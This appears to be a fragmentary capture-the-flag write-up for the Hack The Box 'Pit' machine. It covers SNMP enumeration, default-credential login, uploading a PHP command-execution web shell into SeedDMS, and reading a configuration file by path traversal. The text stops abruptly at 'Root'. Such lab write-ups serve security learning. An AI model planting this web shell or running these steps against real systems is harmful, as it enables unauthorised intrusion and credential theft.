Professional Documents
Culture Documents
Pit
Pit
Pit
SNMP
PORT STATE SERVICE
161/udp open snmp
| snmp-processes:
| 1:
| 2:
| 3:
| 4:
|_ 5:
| snmp-info:
| enterprise: net-snmp
| engineIDFormat: unknown
| engineIDData: 4ca7e41263c5985e00000000
| snmpEngineBoots: 76
|_ snmpEngineTime: 37s
| snmp-sysdescr: Linux pit.htb 4.18.0-
305.10.2.el8_4.x86_64 #1 SMP Tue Jul 20 17:25:16 UTC
2021 x86_64
|_ System uptime: 37.94s (3794 timeticks)
SNMP
snmpwalk -v2c -c public 10.10.10.241 . | tee
snmpwalk.out
I did not found seeddms when I tried to find the url with the ip
http://10.10.10.241/seeddms51x/seeddms
Added it to /etc/hosts
In the snmp Output I also found a username michelle
michelle:michelle worked.
Did a searchsploit against seeddms
<?php
if(isset($_REQUEST['cmd'])){
echo "<pre>";
$cmd = ($_REQUEST['cmd']);
system($cmd);
echo "</pre>";
die;
}
?>
Add document.
The backdoor can be located but first we need to know the document
id ->
When hovering your mouse over the file name we can see the
document id. mine is 29
Change your document id in the below url.
http://dms-pit.htb/seeddms51x/data/1048576/29/1.php?cmd=id
I tried to get a reverse shell but I was not able to, some kind of
firewall maybe so I used what I had to get some credentials.
Enumerating more there was another conf directory in one more ../
../../../conf/settings.xml
PORT 9090
I have a web terminal
michael can write and execute, but can't read, that is why when I tried
to read anything I got an error.
Root